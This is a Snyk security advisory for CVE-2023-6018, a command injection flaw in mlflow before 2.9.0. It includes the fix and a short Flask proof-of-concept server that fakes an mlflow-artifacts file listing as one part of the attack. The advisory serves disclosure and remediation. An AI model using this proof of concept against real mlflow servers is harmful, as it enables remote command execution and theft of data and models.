OS Command Injection Affecting mlflow package, versions [,2.9.0)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
91.16% (99th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-MLFLOW-6069186
- published 17 Nov 2023
- disclosed 16 Nov 2023
- credit kevin-mizu
Introduced: 16 Nov 2023
CVE-2023-6018 Open this link in a new tabHow to fix?
Upgrade mlflow to version 2.9.0 or higher.
Overview
mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.
Affected versions of this package are vulnerable to OS Command Injection through a /ajax-api/2.0/mlflow/model-versions/create request. A malicious user could use this issue to get command execution on the vulnerable machine and get access to data and models information.
PoC
from flask import Flask, jsonify
app = Flask(__name__)
app.config["DEBUG"] = True
@app.errorhandler(404)
def page_not_found(e):
return "Hello World!"
@app.route("/api/2.0/mlflow-artifacts/artifacts")
def index():
return jsonify({
"files": [
{
"path": "/tmp/poc",
"is_dir": False,
"file_size": 50
}
]
})
app.run("0.0.0.0", 4444)
References
CVSS Scores
version 3.1